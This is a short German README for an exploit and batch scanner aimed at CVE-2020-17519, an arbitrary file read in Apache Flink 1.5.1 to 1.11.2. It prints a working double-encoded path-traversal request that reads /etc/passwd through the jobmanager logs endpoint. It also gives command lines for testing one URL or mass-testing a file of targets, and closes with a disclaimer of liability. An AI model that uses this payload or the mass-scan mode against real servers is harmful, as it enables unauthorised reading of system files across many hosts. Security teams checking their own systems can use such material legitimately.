
CVE-2020-17519; Apache Flink beliebiges Dateilesen; Batch-Erkennung
Apache Flink 1.5.1 ~ 1.11.2
POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
python3 CVE-2020-17519 --help Hilfe zur Verwendung anzeigen
python3 CVE-2020-17519 -u http://127.0.0.1:8080 Prüft, ob eine Adresse eine Schwachstelle aufweist
python3 CVE-2020-17519 -f target.txt Massentest auf Schwachstellen
Für sämtliche direkten oder indirekten Folgen und Verluste, die durch die Verbreitung oder Nutzung der in diesem Dokument bereitgestellten Informationen entstehen, ist allein der Nutzer verantwortlich. Der Autor übernimmt keinerlei Haftung.